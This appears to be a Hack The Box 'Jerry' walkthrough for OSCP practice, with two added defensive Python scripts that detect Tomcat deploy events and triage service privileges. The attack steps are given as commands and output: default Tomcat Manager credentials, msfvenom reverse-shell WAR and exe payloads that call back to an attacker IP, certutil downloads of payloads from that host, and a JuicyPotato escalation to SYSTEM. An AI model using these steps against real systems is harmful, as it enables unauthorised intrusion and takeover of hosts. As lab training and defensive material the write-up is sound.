In this practice box from Hack The Box (HTB), we explore one of the machines from TJNull’s list, which is widely recognized as part of the essential preparation for the Offensive Security Certified Professional (OSCP) exam. TJNull’s curated list is designed to help individuals hone their penetration testing skills and get accustomed to the types of challenges they’ll face during the OSCP. This particular box reflects the practical, hands-on nature of the OSCP certification process, providing an excellent opportunity for learners to test and expand their knowledge in a controlled, realistic environment. Whether you’re a seasoned security professional or just starting, working through this box will be a valuable step in your OSCP preparation journey.
nmap scan
# Nmap 7.94 scan initiated Sat Oct 21 22:38:32 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/HTB/results/10.10.10.95/scans/_quick_tcp_nmap.txt -oX /home/kali/HTB/results/10.10.10.95/scans/xml/_quick_tcp_nmap.xml 10.10.10.95
Nmap scan report for 10.10.10.95
Host is up, received user-set (0.34s latency).
Scanned at 2023-10-21 22:38:39 EDT for 37s
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
8080/tcp open http syn-ack Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Oct 21 22:39:16 2023 -- 1 IP address (1 host up) scanned in 44.12 seconds
Full nmap scan
# Nmap 7.94 scan initiated Sat Oct 21 22:38:32 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/kali/HTB/results/10.10.10.95/scans/_full_tcp_nmap.txt -oX /home/kali/HTB/results/10.10.10.95/scans/xml/_full_tcp_nmap.xml 10.10.10.95
Nmap scan report for 10.10.10.95
Host is up, received user-set (0.34s latency).
Scanned at 2023-10-21 22:38:39 EDT for 264s
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
8080/tcp open http syn-ack Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88
|_http-server-header: Apache-Coyote/1.1
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Oct 21 22:43:03 2023 -- 1 IP address (1 host up) scanned in 271.18 seconds
nikto scan
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.10.10.95
+ Target Hostname: 10.10.10.95
+ Target Port: 8080
+ Start Time: 2023-10-21 22:39:19 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /favicon.ico: identifies this app/server as: Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community. See: https://en.wikipedia.org/wiki/Favicon
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS .
+ HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2104
+ /manager/html: Default account found for 'Tomcat Manager Application' at (ID 'tomcat', PW 's3cret'). Apache Tomcat. See: CWE-16
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found.
+ /manager/html: Tomcat Manager / Host Manager interface found (pass protected).
+ /manager/status: Tomcat Server Status interface found (pass protected).
+ 7775 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2023-10-21 23:27:25 (GMT-4) (2886 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
We are able to log in to the Tomcat Manager with the credentials the nikto scan reported (tomcat / s3cret).
The Manager application lets us upload WAR files, and a bit of research shows that a WAR containing a reverse shell can be generated for it. The example I followed is from https://null-byte.wonderhowto.com/how-to/hack-apache-tomcat-via-malicious-war-file-upload-0202593/
msfvenom -p java/shell_reverse_tcp lhost=10.10.14.4 lport=443 -f war -o exploit.war
╰─$ msfvenom -p java/shell_reverse_tcp lhost=10.10.14.4 lport=443 -f war -o exploit.war
Payload size: 13312 bytes
Final size of war file: 13312 bytes
Saved as: exploit.war
╭─kali@kali ~/HTB/jerry
╰─$
we get a shell
╭─kali@kali ~/HTB/jerry
╰─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.95] 49198
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\apache-tomcat-7.0.88>
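A WAR deployed through the Manager application leaves a clear trail in Tomcat's access log (logs/localhost_access_log.*.txt), so this is the place to detect the step just shown. The detector below is an added example for this write-up, not code from the box or from any project; the log lines are constructed in Tomcat's default "common" pattern (%h %l %u %t "%r" %s %b), the addresses mirror the ones in the scan output, and the rule that management is only allowed from localhost (ADMIN_NETS) is an assumed policy.

```python
import re
import ipaddress

# Constructed access-log lines (not from the box) showing a manager login,
# a WAR upload through the HTML manager, a hit on the deployed app, and a PUT.
ACCESS_LOG = """\
10.10.14.4 - - [21/Oct/2023:22:40:11 -0400] "GET / HTTP/1.1" 200 11217
10.10.14.4 - - [21/Oct/2023:22:41:02 -0400] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.4 - tomcat [21/Oct/2023:22:41:09 -0400] "GET /manager/html HTTP/1.1" 200 17052
10.10.14.4 - tomcat [21/Oct/2023:22:45:31 -0400] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC123 HTTP/1.1" 200 17301
10.10.14.4 - - [21/Oct/2023:22:45:40 -0400] "GET /exploit/ HTTP/1.1" 200 0
10.10.14.4 - - [21/Oct/2023:22:46:00 -0400] "PUT /uploads/x.jsp HTTP/1.1" 201 0
127.0.0.1 - tomcat [21/Oct/2023:09:00:00 -0400] "GET /manager/status HTTP/1.1" 200 4096
"""

# Tomcat "common" access-log pattern.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Assumed policy: the manager/host-manager apps may only be used from localhost.
ADMIN_NETS = [ipaddress.ip_network("127.0.0.0/8")]
# Endpoints that (un)deploy applications: the HTML upload form and the text interface.
DEPLOY_PATHS = ("/manager/html/upload", "/manager/text/deploy", "/manager/text/undeploy")


def _admin_source(client):
    """True when the client address falls inside an approved management network."""
    try:
        addr = ipaddress.ip_address(client)
    except ValueError:
        return False
    return any(addr in net for net in ADMIN_NETS)


def detect(log_text):
    """Return (line_no, rule, client, request) tuples for events worth an analyst's time."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        client, method, path, status = m["client"], m["method"], m["path"], int(m["status"])
        req = f"{method} {path} -> {status}"
        # A successful call to a deploy endpoint means new code is now running on the host.
        if path.startswith(DEPLOY_PATHS) and status < 400:
            hits.append((n, "manager-deploy", client, req))
        # Any manager traffic from outside the management network, successful or not.
        if path.startswith(("/manager", "/host-manager")) and not _admin_source(client):
            rule = ("manager-auth-failure-from-unapproved-ip" if status == 401
                    else "manager-access-from-unapproved-ip")
            hits.append((n, rule, client, req))
        # PUT/DELETE outside the manager app: the DefaultServlet is writable.
        if method in ("PUT", "DELETE") and not path.startswith("/manager"):
            hits.append((n, "put-delete-on-content", client, req))
    return hits


if __name__ == "__main__":
    for line_no, rule, client, req in detect(ACCESS_LOG):
        print(f"line {line_no}: {rule:40s} {client:15s} {req}")
```

The same three rules translate directly into a SIEM query: alert on any 2xx response to the deploy endpoints, on manager paths from non-admin sources (a 401 burst is credential guessing, a 200 is a login), and on PUT/DELETE to content paths. The localhost entry on the last line is the expected baseline and produces no hit.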
systeminfo
C:\apache-tomcat-7.0.88>systeminfo
systeminfo
Host Name: JERRY
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00252-00112-46014-AA570
Original Install Date: 6/18/2018, 11:30:45 PM
System Boot Time: 10/21/2023, 10:10:23 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest
Total Physical Memory: 4,095 MB
Available Physical Memory: 3,224 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 3,996 MB
Virtual Memory: In Use: 803 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): 142 Hotfix(s) Installed.
whoami
C:\apache-tomcat-7.0.88>whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
=================== ========
nt authority\system S-1-5-18
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
BUILTIN\Administrators Alias S-1-5-32-544 Enabled by default, Enabled group, Group owner
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
Mandatory Label\System Mandatory Level Label S-1-16-16384
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
=============================== ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeLockMemoryPrivilege Lock pages in memory Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeTcbPrivilege Act as part of the operating system Enabled
SeSecurityPrivilege Manage auditing and security log Disabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Disabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeCreatePermanentPrivilege Create permanent shared objects Enabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeDebugPrivilege Debug programs Enabled
SeAuditPrivilege Generate security audits Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
With SeImpersonatePrivilege enabled, this looks like a candidate for JuicyPotato. Note that the whoami /all output above already reports nt authority\system (Tomcat itself is running as SYSTEM), so on this box the escalation step is not actually needed.
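From the defender's side, the interesting part of that whoami /all output is which privileges the service's token holds at all, not just which are currently Enabled: a Disabled privilege is still held and can be switched on by the process itself. The triage script below is an added example for this write-up, not code from the box; its input is a trimmed copy of the whoami /all output above, the HIGH_RISK set is my own shortlist of privileges that are equivalent to local administrator when held by a service account, and the function names are assumptions.

```python
import re

# Constructed from the whoami /all output shown above, trimmed to the lines
# the triage needs (column spacing as whoami prints it).
WHOAMI_ALL = """\
USER INFORMATION
----------------

User Name           SID
=================== ========
nt authority\\system S-1-5-18


PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State
=============================== ========================================= ========
SeAssignPrimaryTokenPrivilege   Replace a process level token             Disabled
SeTcbPrivilege                  Act as part of the operating system       Enabled
SeDebugPrivilege                Debug programs                            Enabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled
SeBackupPrivilege               Back up files and directories             Disabled
SeCreateGlobalPrivilege         Create global objects                     Enabled
"""

# Privileges that amount to local admin when held by a service account (assumed shortlist).
HIGH_RISK = {
    "SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege", "SeTcbPrivilege",
    "SeDebugPrivilege", "SeBackupPrivilege", "SeRestorePrivilege",
    "SeLoadDriverPrivilege", "SeTakeOwnershipPrivilege", "SeCreateTokenPrivilege",
}
SYSTEM_SID = "S-1-5-18"

USER_RE = re.compile(r"^(?P<name>\S.*?)\s+(?P<sid>S-1-\d+(?:-\d+)*)\s*$")
PRIV_RE = re.compile(r"^(?P<priv>Se\w+Privilege)\s+.*?\s+(?P<state>Enabled|Disabled)\s*$")


def parse_whoami_all(text):
    """Return {'user': str, 'sid': str, 'privileges': {name: state}} from whoami /all output."""
    result = {"user": None, "sid": None, "privileges": {}}
    for line in text.splitlines():
        m = PRIV_RE.match(line)
        if m:
            result["privileges"][m["priv"]] = m["state"]
            continue
        m = USER_RE.match(line)
        if m and result["sid"] is None:        # first SID line is the user's own
            result["user"], result["sid"] = m["name"], m["sid"]
    return result


def triage(text):
    """Summarise what this token means for the host's exposure."""
    info = parse_whoami_all(text)
    held = sorted(p for p in info["privileges"] if p in HIGH_RISK)
    enabled = sorted(p for p in held if info["privileges"][p] == "Enabled")
    if info["sid"] == SYSTEM_SID:
        verdict = "service already runs as SYSTEM; fix the service account, not the token"
    elif held:
        verdict = "token holds admin-equivalent privileges; treat the service account as local admin"
    else:
        verdict = "no admin-equivalent privileges held"
    return {"user": info["user"], "is_system": info["sid"] == SYSTEM_SID,
            "high_risk_held": held, "high_risk_enabled": enabled, "verdict": verdict}


if __name__ == "__main__":
    for key, value in triage(WHOAMI_ALL).items():
        print(f"{key:18s} {value}")
```

The practical remediation this points at is the same in both cases: run Tomcat under a dedicated low-privilege service account (or a virtual service account) that does not hold SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege or SeDebugPrivilege, so that a compromise of the web application does not arrive as SYSTEM in the first place.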
shell
╰─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.4 -a x64 --platform windows LPORT=444 EXITFUNC=thread -f exe -o shell.exe
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: shell.exe
╭─kali@kali ~/HTB/jerry
certutil -urlcache -f http://10.10.14.4:90/shell.exe C:\Users\Public\Downloads\shell.exe
certutil -urlcache -f http://10.10.14.4:90/JuicyPotato.exe C:\Users\Public\Downloads\JuicyPotato.exe
C:\Users\Public>cd downloads
cd downloads
C:\Users\Public\Downloads>certutil -urlcache -f http://10.10.14.4:90/shell.exe C:\Users\Public\Downloads\shell.exe
certutil -urlcache -f http://10.10.14.4:90/shell.exe C:\Users\Public\Downloads\shell.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
C:\Users\Public\Downloads>certutil -urlcache -f http://10.10.14.4:90/JuicyPotato.exe C:\Users\Public\Downloads\JuicyPotato.exe
certutil -urlcache -f http://10.10.14.4:90/JuicyPotato.exe C:\Users\Public\Downloads\JuicyPotato.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
C:\Users\Public\Downloads>
Run JuicyPotato
C:\Users\Public\Downloads>JuicyPotato.exe -t * -p C:\Users\Public\Downloads\shell.exe -l 443
JuicyPotato.exe -t * -p C:\Users\Public\Downloads\shell.exe -l 443
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 443
......
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
C:\Users\Public\Downloads>whoami
whoami
nt authority\system
C:\Users\Public\Downloads>
We get an administrative shell as NT AUTHORITY\SYSTEM.